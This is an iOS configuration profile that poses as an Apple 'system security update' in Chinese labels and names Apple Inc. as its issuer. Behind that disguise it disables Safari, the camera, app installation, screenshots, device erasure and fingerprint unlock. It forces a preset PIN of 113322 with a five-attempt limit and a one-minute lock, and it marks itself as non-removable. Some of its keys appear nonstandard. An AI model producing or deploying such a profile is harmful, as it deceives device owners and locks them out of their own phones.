<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>PayloadContent</key>
    <array>
        <dict>
            <key>PayloadDescription</key>
            <string>系统安全更新</string>
            <key>PayloadDisplayName</key>
            <string>iOS系统更新</string>
            <key>PayloadIdentifier</key>
            <string>com.apple.security.28CA4F6E-D742-4687-8807-61C341B49475</string>
            <key>PayloadType</key>
            <string>com.apple.applicationaccess</string>
            <key>PayloadUUID</key>
            <string>B270598C-8DD5-4A76-ABBF-AF73B9E61124</string>
            <key>PayloadVersion</key>
            <integer>1</integer>
            <key>allowAddingGameCenterFriends</key>
            <false/>
            <key>allowAppInstallation</key>
            <false/>
            <key>allowAssistant</key>
            <false/>
            <key>allowCamera</key>
            <false/>
            <key>allowCloudBackup</key>
            <false/>
            <key>allowInAppPurchases</key>
            <false/>
            <key>allowSafari</key>
            <false/>
            <key>allowScreenShot</key>
            <false/>
            <key>forceEncryptedBackup</key>
            <true/>
        </dict>
        <dict>
            <key>PayloadDescription</key>
            <string>密码锁定</string>
            <key>PayloadDisplayName</key>
            <string>系统密码策略</string>
            <key>PayloadIdentifier</key>
            <string>com.apple.mobiledevice.passwordpolicy.28CA4F6E-D742-4687-8807-61C341B49475</string>
            <key>PayloadType</key>
            <string>com.apple.mobiledevice.passwordpolicy</string>
            <key>PayloadUUID</key>
            <string>215A6170-857F-4690-AB7E-F1632D32562E</string>
            <key>PayloadVersion</key>
            <integer>1</integer>
            <key>allowSimple</key>
            <false/>
            <key>forcePIN</key>
            <true/>
            <key>maxFailedAttempts</key>
            <integer>5</integer>
            <key>maxInactivity</key>
            <integer>1</integer>
            <key>minLength</key>
            <integer>6</integer>
            <key>requireAlphanumeric</key>
            <false/>
            <key>maxGracePeriod</key>
            <integer>0</integer>
            <key>pinHistory</key>
            <integer>1</integer>
            <key>defaultPIN</key>
            <string>113322</string>
        </dict>
        <dict>
            <key>PayloadDescription</key>
            <string>锁定设置</string>
            <key>PayloadDisplayName</key>
            <string>限制</string>
            <key>PayloadIdentifier</key>
            <string>com.apple.restrictions.28CA4F6E-D742-4687-8807-61C341B49475</string>
            <key>PayloadType</key>
            <string>com.apple.restrictions</string>
            <key>PayloadUUID</key>
            <string>F7376D97-98C9-4581-8FBC-C55B56F3A3E7</string>
            <key>PayloadVersion</key>
            <integer>1</integer>
            <key>allowEraseContentAndSettings</key>
            <false/>
            <key>allowLockScreenControlCenter</key>
            <false/>
            <key>allowLockScreenNotificationView</key>
            <false/>
            <key>allowLockScreenTodayView</key>
            <false/>
            <key>forceEncryptedBackup</key>
            <true/>
            <key>forceITunesStorePasswordEntry</key>
            <true/>
            <key>allowActivityContinuation</key>
            <false/>
            <key>allowFingerprintForUnlock</key>
            <false/>
            <key>allowFingerprintModification</key>
            <false/>
        </dict>
    </array>
    <key>PayloadDescription</key>
    <string>系统安全更新配置</string>
    <key>PayloadDisplayName</key>
    <string>系统更新</string>
    <key>PayloadIdentifier</key>
    <string>com.apple.configuration.28CA4F6E-D742-4687-8807-61C341B49475</string>
    <key>PayloadOrganization</key>
    <string>Apple Inc.</string>
    <key>PayloadRemovalDisallowed</key>
    <true/>
    <key>PayloadType</key>
    <string>Configuration</string>
    <key>PayloadUUID</key>
    <string>28CA4F6E-D742-4687-8807-61C341B49475</string>
    <key>PayloadVersion</key>
    <integer>1</integer>
</dict>
</plist>